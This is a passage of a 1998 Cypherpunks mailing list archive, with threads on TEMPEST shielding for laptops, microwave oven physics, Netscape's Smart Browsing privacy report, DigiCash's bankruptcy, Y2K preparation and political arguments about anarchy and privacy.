No, they don't. It is perfectly legal for an individual to own a weapon.
There is also a clear distinction between the local police, your state
police, federal agents, military, etc. Lumping them all into one generic
category is a disservice and is unrealistic (especialy since they are often
in adversarial roles) if we really want to understand how our society works
and where we can take it.

> You do not generally
> consider the black market in determining monopolistic conditions, and in
> fact the existence of a black market in a segment generally points to a
> coercive monopoly in the public one.

No it doesn't. It points to the fact that individuals want to participate in
some activity that some other party doesn't want to occur. It does not imply
that the regulating party wants the potential income from those activities.

Further more, even in a free-market there will exist black markets. It's
always cheaper to buy stolen merchandise than legitimately purchased
merchandise. The aspect of a free-market is that there is no consequence
from such actions (unless you want to admit to allowing corporations to have
their own hit squads). Again, a function of human psychology and not
economics or political systems.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 14:33:28 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST laptops (fwd)
Message-ID: <199811050611.AAA10989@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 4 Nov 1998 21:45:29 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: TEMPEST laptops

> Radio waves scatter...they don't just travel in pure line of sight. And
> even if they travelled only in line of sight, the reflections from inside
> the box and then into the room and then off surfaces....

It depends on the frequency. Last time I checked a laser or a maser (both
are radio waves strictly speaking) travel LOS. The scattering comes from
beam divergence and incidental refractions and reflections from the
molecules in the air and supported detritus.

> Microwave ovens work by having the waves bounce around inside a box. Any
> significant hole or crack (up to roughly half the wavelength) would let the
> waves out.

Depends on the size of the hole and location. In most microwave ovens there
are definite dead-spots (corners and the exact center of the area are
notorius).

> An open top box will not work.

If the microwaves (for example) are transmitted parallel to the open side it
might very well work just fine. It's going to depend on a variety of
factors that will preclude such a blanket statement from being valid.

> Unlikely to prevent someone from figuring out what the real signal is. It's
> very difficult, generally, to hide a signal with another signal. Noise
> won't work, because noise can be filtered or autocorrelated out. A "spoof"
> signal can be corrected for.

For these to work there must be a time-correlated aspect to the signal that
doesn't appear in the noise. If you mask the signal with the same sort of
time correlated cover (eg phase shifting) it also might work.

> And we are talking about 100 dB sorts of suppression. Mere factors of a few
> with fake signals and noise are meaningless on this scale.

The absolute magnitude isn't really important.

Most of the signals that are emitted by a computer are not in the 100dB
dynamic range (@2x=3db that's a signal range of 1:33) , more likely 40-50db
if that. For a TTL (5V) signal it barely covers 3dB (LOW is <2.5v and a
high is >=4.75). There simply is no way in hell a signal with a 3dB range is
going to emit a rf signal that is 100dB. There are other logic families with
wider dynamic ranges (eg CMOS w/ 18V Vcc can be nearly 18V or approx. about
12dB).


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 6 Nov 1998 18:13:08 +0800
To: Ken Williams <cypherpunks@toad.com
Subject: Re: US Cyberthreat Policy
In-Reply-To: <199811051449.JAA12327@camel8.mindspring.com>
Message-ID: <3.0.5.32.19981105012448.0094c240@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 04:37 PM 11/5/98 -0500, Ken Williams wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>Kenneth A. Minihan and George J. Tenet Elected to America Online, Inc.
>Board of Directors
>New Board Members Hail From NSA and CIA 

Yee-hah!!!    Happy Guy Fawkes Day!!!


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Thu, 5 Nov 1998 16:37:30 +0800
To: cypherpunks@cyberpass.net
Subject: "Practical Joke"
Message-ID: <199811050812.DAA02571@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>Pssst...
>
>When John Glenn returns from space, everyone dress in ape suits.
>
>Pass it on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 22:04:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST laptops (fwd)
Message-ID: <199811051325.HAA11660@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 4 Nov 1998 23:19:17 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: TEMPEST laptops (fwd)

> >It depends on the frequency. Last time I checked a laser or a maser (both
> >are radio waves strictly speaking) travel LOS. The scattering comes from
> >beam divergence and incidental refractions and reflections from the
> >molecules in the air and supported detritus.
> 
> Oh come on, let's not get into sophistry. And lasers are not considered to
> be radio frequency devices by anyone I know of...visible, IR, and UV lasers
> are all treated as _photon_ devices, "light."  (Yes, yes, I know about
> particles vs. waves.)

p-v-w is irrelevent.

No Tim, it's photons as the intermediate vector boson for EM radiation.
*ALL* physicist consider light to be hi-freq radio waves, or radio waves to
be low-freq light. Hell, strictly speaking standing in the middle of a dark
room waving a bar magnet back and forth is a very low freq. flash light.

And you have a physics degree......

> Nope, they'll still get out. The parallel mirror scenario.

Irrelevant.

Last time I checked my microwave was 8 corner reflectors. That says that
ultimately the ray goes back along the way it came with a shift in beam axis.

How a microwave works is that up in one corner is a small grating. Behind
that grating is a magnetron/klystron/etc. tube. That tube sends a beam out
through that little grating. The axis of the tube is slightly mis-aligned
,otherwise the beam would come back into the tube and burn it out - also why
you don't put metal things in there, it disrupts the reflection pattern. As
a consequence of this design the corners and the exact center of the cavity
don't get enough microwave radiation to do much of anything with. If you
were to actualy map the microwaves you'd see beams bouncing back and forth
and not continous coverage. There are actualy spots in every microwave oven
cavity that get zero radiation. Anything put in there cooks as a function of
the water in its neighbor heating up and transfered by the standard
thermodynamic (which is also EM by the way) mechanism.

Test it yourself.

> We're talking about signal strength of the emitted RF  being knocked down
> 80 or 100 dB  by the shielding. This is a common way of talking about the
> effectiveness of a Faraday cage.

True, the point I'm trying to make to you folks is that it *ISN'T* the
absolute level of the signal that you are necessarily concerned with but
rather the dynamic range in that signal. Simply knowing there's a 3mV signal
out there won't do you a damn bit of good unless you have enough signal range
to decode the contents. In actuality you could be emitting GW's of signal and
if there was only say 1uV of signal range you'd never get anything off it.

It just occured to me that one way to weaken TEMPEST is to mask the signals
(not sure exactly how) that are emitted by encrypting (ie whitening) the
signal when it's on exposed/radiating buss or connector.



    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 22:08:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Cryptography Study Group - Palo Alto (fwd)
Message-ID: <199811051335.HAA11763@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 4 Nov 1998 22:45:42 -0800
> From: John Cutler <jcutler@via.net>
> Subject: Cryptography Study Group - Palo Alto

> A Palo Alto-centered cryptography study group has been been formed.
> Our first project is to read Schneier's "Applied Cryptography."  We
> meet a couple times each week to go over assigned reading and to play
> with ideas about cryptography.  While the current participants all
> have a professional interest in the field, we are loosely organized.
> Readings are decided at the previous meeting giving us the flexibility
> to explore particular ideas in depth.
> 
> Please contact me if you would like to join us.

This is a GREAT! idea John.

If you don't object, and since Austin Cypherpunks are dead dead dead, I
believe I'll start something similar.

I think the approach I'll use is a bit different in that I'm going to ask
participants to read say the first chapter and get together over some period
and actualy write a program (probably in Perl) that impliments the topic(s)
under discussion. If it were to meet say every other week for two hours they
should be able to go through a chapter every couple of months or so.

Now I've got to find a place suitable....:)


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 5 Nov 1998 21:21:32 +0800
To: cypherpunks@cyberpass.net
Subject: Netscape inside scoop on "Smart Browsing"
Message-ID: <v04020a01b2674da3d3bb@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: tarnhelm.blu.org: majordom set sender to
owner-isig@blu.org using -f
From: rivalcs@ma.ultranet.com
To: <isig@blu.org>
Subject: Netscape inside scoop on "Smart Browsing"
Date: Thu, 5 Nov 1998 06:00:21 -0500
MIME-Version: 1.0
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3
Importance: Normal
Sender: owner-isig@blu.org
Precedence: bulk
Reply-To: isig@blu.org

> * IS SMART BROWSING REALLY SO SMART?
> (contributed by Mark Joseph Edwards, http://www.ntsecurity.net)
> Many of you are aware of Netscape's new versions of its Navigator Web
> browser. But do you also know that, starting with version 4.06, the
> product's Smart Browsing feature can report to Netscape every Web page
> you visit, including addresses to private sites on your internal
> network? And are you aware that when you download a secure version of
> Netscape's browser, the process places a cookie on your system that can
> match your name and address to your Web surfing habits? Matt Curtin,
> Gary Ellison, and Doug Monroe of Interhack published a report that
> outlines the details. Netscape's What's Related? browser feature (a
> technology provided by Alexa Internet) seems to be the cause of this
> potential invasion of privacy. For those who don't know, the What's
> Related? feature delivers a list of URLs associated with the Web page
> you're visiting. The feature does this by automatically appending the
> URL of the page you're visiting to the end of another URL and sending
> it to a server at Netscape. For example, if you visit my Web site
> (http://www.ntsecurity.net), the URL that Netscape receives is
> http://www-rl4.netscape.com/wtgn?www.ntsecurity.net. And when Netscape
> uses this URL to return a list of URLs for related sites, the URLs
> aren't directly linked-they go through Netscape, telling Netscape which
> site, if any, you chose from the list. The related URLs link to
> http://info.netscape.com, which forwards you to the intended
> destination. The link URLs look like this:
> http://info.netscape.com/fwd/rl/http://www.ntshop.net:80/.
>   The report states that the group isn't accusing anyone of malice, and
> clearly points out that even the best-intended systems can have
> undesirable consequences. The real bone to pick here is the lack of
> disclosure to potential users of the Smart Browsing technology, and
> lack of a statement about the intended storage and use of private
> browsing information collected from unsuspecting Netscape users.
> According to the report, the feature enables by default, and no
> documentation on the feature existed until the report became public. I
> don't know about you, but if I bought a new Corvette from General
> Motors (GM), and the Corvette reported to GM every place I went, I'd
> expect GM to tell me up front. Otherwise, I'd feel deceived and taken
> advantage of. But then again, maybe I'm being paranoid when I assume
> that private actions should remain private.
>   http://www.interhack.net/pubs/whatsrelated/
>   http://home.netscape.com/escapes/related/faq.html
>

Rick Desautels
Sr. Systems Engineer
Rival Computer Solutions
rivalcs@ma.ultranet.com


--
To unsubscribe from this list, send mail to majordomo@blu.org
with the following text in the *body* (*not* the subject line) of the letter:
unsubscribe isig

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 23:32:11 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: How to test *your* microwave oven distribution pattern.
Message-ID: <199811051447.IAA12209@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Here's a simple way to test the bounce-pattern of your micro-wave oven:

 -	Go to your local hobby store and buy some small balsa or pine
        sheeting, stringers (4x), and glue (non-water based). You'll
        also need several small open top containers (like a shot glass
        but smaller for best effect) and a marker.

 -	Cut the stringers to the vertical height of your oven cavity.

 -	Cut the sheeting into 1in. sq. pieces.

 -	Mark the stringers evenly such that there is enough room to glue
        the sheeting between the stringers, forming a multi-leveled tower.

 -	On each level place your container with a suitable amount of
	water (fill it almost to the brim).

 -	Place the tower w/ it's containers in one of the corners. Mark
        a line around the base so you know where you been.

 -      Start your microwave up (adjust time as needed, say start with
        30s) and note the temperature of each container after the time.
	Note that putting your thermometer in there will cool it slightly
        and you'll also need to have the same number of runs and levels so
        so each level can be measured immediately after opening the door.
 	If you have access to an optical pyrometer you could potentialy
        measure them all.

 -	Once you've measured it here, move it over to be adjacent to the
	lines you drew above, outline the base again and repeat as needed.

 -	Run your regression and your done, tadah.

Some glasses will be hot, others won't. Trace the path of the beam out of
the magnetron and you'll get a good idea of what your oven is really doing.

Whether the cavity is stricly a corner reflector (ie corners are square) or
is trapezoidal (slightly off square to help disperse the bounce pattern not
the beam) is irrelevant to the actual holes in the pattern, they will be
there.

I'll mention but not go into the shadowing effect of objects placed in the
cavity and the requirement for even cooking means that they have to be
rotated for even dispersal of the cooking effect. Another indication that
the beam doesn't disperse as widely or quickly as some claim.

On another topic about holes and escaping microwaves, if the holes are the
right size (which the screen in the glass in the front of your oven is)
they will preferentialy absorb the microwave, if it's correctly grounded
very little of the radiation will escape (as you can measure with a standard
microwave oven leak detector).

Now, let's talk about ways to build a laptop that will reduce the emissed
radiation to a minimum.

First, put all the computing guts into a small box that is well grounded
(running on a battery will pretty much screw you here since it ain't
grounded unless you drive a stake into the ground). Then make sure that any
openings or gaps are in the front edge or on the bottem pointed down. There
should be no breaks in the sides, rear, or top. Make sure the floppy, CD,
hard drive are placed in the front of the laptop container adjacent to the
metal box above and make sure any openings in them point out. The reason you
want the openings in the front edge is that  your body will make a
very good sheild to that hi-energy rf that folks want to tap. The openings on
the bottem will direct it to the ground where where they are absorbed (why they
call it a ground-plane). Make sure that all cabling from the peripherals to
the computing box are shielded (remember, ground the shield at one end
only). The seam or hinge between the display and the case should be shielded
with standard copper fingers. The cabling should also be well shielded. Make
sure there is a grounded screen covering the front of the LCD (and for gods
sake don't ever use a plasma display). The exterior case should be metal
(why I love my Tadpole 3XP and IBM N40). All openings for batteries and such
should be screwed down and not simply retained by a latch of some sort. The
*ONLY* way to power the laptop should be by battery. There should be no
provision to power it off the ac mains (this is going to be inconvenient
since you'll need to carry extra batteries, an external charger for them,
and the screw drivers and such to change them - no simply and easy pop-outs
here).

As to the display, the ideal display would be a dual-display HMD that was
also sheilded. This is based on the assumption that if your data is so
sensitive that you don't want people snarking it out of the air you probably
don't want them reading it over your shoulder (up close or through a
tele-photo).

If you do decide to stake your laptop as refered above there are a few
things to know....

 -	Make sure the stake is in suitable ground without lots of quartz
        and other similar peizo-electric materials.

 -	The stake should extend at least 3ft. into the ground.

 -	When the stake is driven in, the ground should be thoroughly wetted
        which usualy means quite a bit of water (30 gals or so should do
        it), if possible wet it over a 24 hour period prior to staking.

 -	Make sure the stake and the cable leading to the laptop are copper
        (or silver if you're rich)

 -	You don't want to be close to phone, power, and other sorts of
        underground utilities.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Warren E. Agin" <agin@tiac.net>
Date: Thu, 5 Nov 1998 23:10:44 +0800
To: rah@shipwright.com>
Subject: Re: DigiCash Inc. to File Reorganization, Seeks Partners to Driv
In-Reply-To: <v04020a12b2666fb92bd4@[139.167.130.246]>
Message-ID: <199811051422.OAA10028@mail-out-4.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



Finally, some real meat for a bankruptcy/technology lawyer.  I've 
been predicting for some time now that technology 
companies will start to use the bankruptcy process as the industry 
starts to shake out.  The PR aside, these filings are generally 
prompted by one or more strata of large debt obligations or 
convertable securities, and the company's inability to continue to 
make required payments.  What DigiCash will probably do is 
restructure its existing debt structures while seeking partners to 
obtain additional cash flows needed to continue operations.

I'll be interested to see how it all works out.

-Warren Agin
Boston, Massachusetts
> FYI...
> 
> DigiCash Inc. to File Reorganization, Seeks Partners to Drive eCash Forward
> 
> PALO ALTO, CALIF.--November 4, 1998
> 
> DigiCash Inc. has announced that it is entering into a Chapter 11
> reorganization to allow it to pursue strategic alternatives for its
> electronic cash ("eCash" T) products and the associated intellectual assets
> pioneered by DigiCash.
> 
___________________________________________________

               Warren E. Agin
         Law Offices of Warren E. Agin
       76 Canal Street, Boston MA 02114
       (617)227-3201  (f)(617) 227-6365
                www.agin.com
___________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 5 Nov 1998 23:11:15 +0800
To: cypherpunks@cyberpass.net
Subject: Y2K prompts many to prepare, 6-month delays now common
Message-ID: <199811051431.GAA21966@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



>X-Sender: declan@mail.well.com
>X-Mailer: QUALCOMM Windows Eudora Pro Version 4.0.2 
>Date: Thu, 05 Nov 1998 08:24:55 -0500
>To: politech@vorlon.mit.edu
>From: Declan McCullagh <declan@well.com>
>Subject: FC: Y2K prompts many to prepare, 6-month delays now common
>Sender: owner-politech@vorlon.mit.edu
>Reply-To: declan@well.com
>X-Loop: politech@vorlon.mit.edu
>X-URL: Politech is at http://www.well.com/~declan/politech/
>
>[I think this is important news: Y2K fear has grown faster than many of us
>expected it would. Companies tell me that unless you place your order by
>early next year, you'll receive it after 1-1-00. --Declan]
>
>
>http://www.wired.com/news/news/politics/story/16035.html
>
>            Companies selling bulk food,
>            generators, and solar energy systems
>            report backlogs of up to six months. The
>            reason: nationwide hand-wringing over
>            the millennium bug. By Declan McCullagh. 
> 
>
>
>
>
>--------------------------------------------------------------------------
>POLITECH -- the moderated mailing list of politics and technology
>To subscribe: send a message to majordomo@vorlon.mit.edu with this text:
>subscribe politech
>More information is at http://www.well.com/~declan/politech/
>--------------------------------------------------------------------------
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 6 Nov 1998 02:03:17 +0800
To: ravage@EINSTEIN.ssz.com
Subject: Re: TEMPEST laptops (fwd)
Message-ID: <3641E026.918@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim,

***
True, the point I'm trying to make to you folks is that it *ISN'T* the
absolute level of the signal that you are necessarily concerned with but
rather the dynamic range in that signal. Simply knowing there's a 3mV
signal
out there won't do you a damn bit of good unless you have enough signal
range
to decode the contents. In actuality you could be emitting GW's of
signal and
if there was only say 1uV of signal range you'd never get anything off
it.
***

The distinction you are trying to express is that not all signals have
equal information content and that it is the levels of the high-content
ones that matter. Fine, but shielding is indiscriminate so shield away.
And run your Tesla coil and some Ramones music to increase the ambient
noise while you're doing sensitive computing.

BTW - Aren't most receivers sensitive to RF field strengths in the 1
uV/m range? 
With cryogenically cooled front ends the nV/m range is probably usable.
Look for MIB carrying Dewars in your neighborhood! 
How cold do Peltier junctions get? 
Probably good enough for a sidewinder or a low-noise rcvr.

Mike

Gabba-gabba hey!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Nov 1998 23:40:23 +0800
To: cypherpunks@toad.com
Subject: US Cyberthreat Policy
Message-ID: <199811051449.JAA12327@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The USIA E-journal, Foreign Policy Agenda, for November
is titled "Cyberthreat: Protecting US Information Networks."
It has articles by the head of NSA, DoD's Hamre, CIAO's Hunker,
Y2K Office's Koskinen, Senator Kyl, and reps from Microsoft, 
IBM and others:

  http://www.usia.gov/journals/itps/1198/ijpe/toc.htm

Martin Libicki of RAND criticizes the administration's crypto
policy for hindering widespread information protection:

   http://jya.com/ml110498.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Warren E. Agin" <agin@tiac.net>
Date: Thu, 5 Nov 1998 23:39:50 +0800
To: bankrlaw@polecat.law.indiana.edu
Subject: Re: DigiCash Inc. to File Reorganization, Seeks Partners to Driv
In-Reply-To: <v04020a12b2666fb92bd4@[139.167.130.246]>
Message-ID: <199811051508.PAA16694@mail-out-4.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



For those who are really interested, the DigiCash Incorporated 
Chapter 11 case was filed in the Northern District of California.  
The case number is 98-58986.
___________________________________________________

               Warren E. Agin
         Law Offices of Warren E. Agin
       76 Canal Street, Boston MA 02114
       (617)227-3201  (f)(617) 227-6365
                www.agin.com
___________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Warren E. Agin" <agin@tiac.net>
Date: Thu, 5 Nov 1998 23:40:12 +0800
To: bankrlaw@polecat.law.indiana.edu
Subject: (Fwd) Re: DigiCash Inc. to File Reorganization, Seeks Partners
Message-ID: <199811051508.PAA16689@mail-out-4.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain




For those who are really interested, the DigiCash Incorporated 
Chapter 11 case was filed in the Northern District of California.  
The case number is 98-58986.

-Warren Agin
___________________________________________________

               Warren E. Agin
         Law Offices of Warren E. Agin
       76 Canal Street, Boston MA 02114
       (617)227-3201  (f)(617) 227-6365
                www.agin.com
___________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 6 Nov 1998 01:33:39 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone(fwd)
In-Reply-To: <199811042301.RAA09484@einstein.ssz.com>
Message-ID: <v04011707b26770a8f601@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:01 PM -0500 11/4/98, Jim Choate wrote:
>Forwarded message:
>
>> From: Matthew James Gering <mgering@ecosystems.net>
>> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>> 	 Alternative
>> Date: Wed, 4 Nov 1998 14:29:47 -0800
>
>> Petro wrote:
>> > However, Privacy + Freedom == Anarchy, or close enough to be
>> > indistinguishable.
>
>This is silly.

	And you're a fool, but I can be serious.

	Try reading what I said, and (I know this is difficult for you)
THINK ABOUT IT.

	Anarchy is usually defined as the absense of government. What
exactly makes up a "government", what are it's defining characteristics?

	Simply a device for reallocating wealth?--Insufficient, there are
lots of mechanisms for that.

	A body that lays down standards and rules of conduct?--Sounds like
a church or industry consortium to me.

	A heirarchical (sp?) structure that uses fear, propaganda and force
to reallocate wealth, enforce standards and rules of conduct, and other
things at whim (for varying values of "whim", from the "whim" of a
dictator, to the "whim" of the "body politic").

	Now, THAT is a government. Yes, some of what it enforces is
probably a good idea (i.e. everyone driving on the same side of the road,
&etc) some if it is kinda silly (don't smoke dope, or you're going to jail
(Here, have a beer)), and some of it is downright stupid and shortsighted
(encryption policy, not drinking beer out of a bucket on the sidewalk).

	Anarchy is not having to be effected by that, being "free" to
follow what one thinks is right. How one gets to that state is not really
relevent. My statement above simply lays out the position having Privacy
(for large enough values of privacy to be meaningful) and Freedom (for
large enough values of Freedom to be meaningful) one is effectively in an
anarchistic state. That is what "close enough to be meaningful" meant.

	Privacy is (at least it's my understanding) the ability to hide or
mask   information in such a way that only people you wish to have access
to it do.

	There are varying degrees of Privacy, from "Well, at least they
don't analyize what's in my feeces, even if they do watch me take it" to
being able to completely hide any information at all from anyone.

	Freedom is the ability to make choices, and exercise those choices.

	Just like privacy, there are varying degrees of freedom, from the
convict who can chose wheter he/she wants to eat that slop or go hungry, to
the president of the US who can (apparently) bomb people with impunity, lie
under oath & etc.

	When the amount of freedom and privacy is high enough, it is
indistinguishable from anarchy. No one, wheter part of some heirarchial
structure or not can force you to do certain things, or to live a certain
way, or to pay a given percentage of your time (labor, money, life) to them
for "services" of dubious value.

	Now, I realize that if I were just speaking to Jim, this would be a
waste of time, because he consistently fails to read entire paragraphs,
misunderstands simple terms, and doesn't always manage to connect dependent
clauses, but there may be some out there who could provide a reasonable
critique of what I am saying, and may even be able to give me some food for
thought.

>> for privacy. In fact there is good claim that privacy will not exist in
>> anarchy except by those that decide to use the tools and methods to achieve

	Privacy doesn't exist anywhere unless one chooses to use the tools
and methods to acheive it.

	If I don't want privacy, or if it isn't of value to me, I shouldn't
have to be bound by it. If I do want it, I should be able take steps
(analagous to putting up curtains on a bay-window) to secure it.

	Governments cannot provide large values of privacy, it's not how
they work. They can limit exposure, but that is more of a false privacy
than real privacy.

--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 6 Nov 1998 01:30:16 +0800
To: <cypherpunks@Algebra.COM>
Subject: RE: Quick, Dear -- Beat Me
In-Reply-To: <199811041840.NAA00424@mail1.panix.com>
Message-ID: <v04011708b26778fcead6@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:08 AM -0500 11/5/98, Blanc wrote:
>From Duncan Frissell:
>
>: Protection of "victims" won't work if the new number is
>: reported to the Big Three credit reporting bureaus.
>...................................................
>
>I just went to the bank I do business with this week to open a new account.
>They wanted my social security number, (which they actually already have on
>record), and during a search on her handy database, the Customer Assistance
>clerk informed me that there was another person in Florida using the same
>number.
>
>I don't presently have a credit card, so I'm not worried about losing any cash
>at this time.    The clerk gave me a form to send to ChexSystems for a
>consumer
>report and advice to notify the Social Security dept about it.   I don't
>really
>want to discuss it with them.  Think it would be to my benefit to just
>leave it
>alone?  <g> Probbly not.

	If they are using your name as well, they could be damaging your
credit rating.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 6 Nov 1998 01:33:06 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: Who Cares
In-Reply-To: <000601be087d$5cda57e0$3b8195cf@blanc>
Message-ID: <v04011709b2677946fc22@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:22 AM -0500 11/5/98, Blanc wrote:
> When the politicians speak they always make statements which imply that
>they're
>speaking to, and being heard by,  the whole nation.   I just read a notice
>that
>less than 40% of eligible voters went to the polls.   Since the
>Republicans are
>still in the majority, this means that less than one quarter of the voting
>population supports Clinton as President.   And only slightly more than one
>quarter support Republicans.   This would be meaningful to me, if I was making
>policy:  what are all those other people doing?

	The fact that it is meaningful to you means you will never (as long
as it is meaningful to you) get anywhere as a politician, as you still
actively beleive that a politican is there to do the will of the people.

	This can be demonstrated to be a false assumption.
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 6 Nov 1998 01:40:44 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Who Cares (fwd)
In-Reply-To: <199811050539.XAA10683@einstein.ssz.com>
Message-ID: <v0401170ab26779ac144b@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:39 AM -0500 11/5/98, Jim Choate wrote:

>If you're talking about the people who didn't vote, they're trying to keep
>from going under. Probably working two jobs, keeping the kids in school and
>out of trouble, saving for college, paying the house morgage off, etc. Who's
>in office won't make a whit of difference to any of that. It's irrelevant.

	That's crap.

	While I won't deny that some of the people who don't vote are in
the position you claim they are, their not voting has nothing to do with
their economic position, it has to do with the facts that:

	1) This is a mid-term election. Since it isn't a presidential
election, fewer really care to research the issues (which are fewer).

	2) We are currently in decent economic times, and as Terry Pratchet
noted on Men At Arms, (paraphrasing here) Most people don't really care
about democrazy, Equal Rights, or any of that, they just want tomorrow to
